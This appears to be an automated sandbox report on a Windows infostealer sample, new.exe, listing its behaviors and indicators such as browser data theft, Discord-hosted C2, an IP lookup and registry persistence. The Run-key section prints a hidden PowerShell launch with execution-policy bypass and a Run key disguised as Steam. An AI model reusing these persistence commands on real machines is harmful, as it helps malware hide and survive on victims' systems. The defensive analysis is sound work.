Malware Analysis Report

2025-03-15 00:54

Sample ID 240626-qpm3pawfrb
Target new.exe
SHA256 dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86
Tags
defense_evasion execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

dcfefc6ab68f29b9b2d1119bff758dd024d922b5ec7fa7d70110e50807863d86

Threat Level: Likely malicious

The file new.exe was found to be: Likely malicious.

Malicious Activity Summary

defense_evasion execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Hide Artifacts: Hidden Window

An obfuscated cmd.exe command-line is typically used to evade detection.

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Modifies registry class

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates processes with tasklist

Modifies registry key

Detects videocard installed

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-26 13:26

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 13:26

Reported

2024-06-26 13:29

Platform

win7-20231129-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\new.exe

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-26 13:26

Reported

2024-06-26 13:35

Platform

win10v2004-20240611-en

Max time kernel

510s

Max time network

511s

Command Line

"C:\Users\Admin\AppData\Local\Temp\new.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\new.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\wpesfcWHQdjImlV.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\new.exe" C:\Windows\system32\reg.exe N/A

Hide Artifacts: Hidden Window

defense_evasion

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133638820123539450" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2080292272-204036150-2159171770-1000\{D4AA11F1-ED75-48B5-B3E5-B92618C61393} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution

Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\new.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 412 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 412 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\new.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 536 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2956 wrote to memory of 116 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
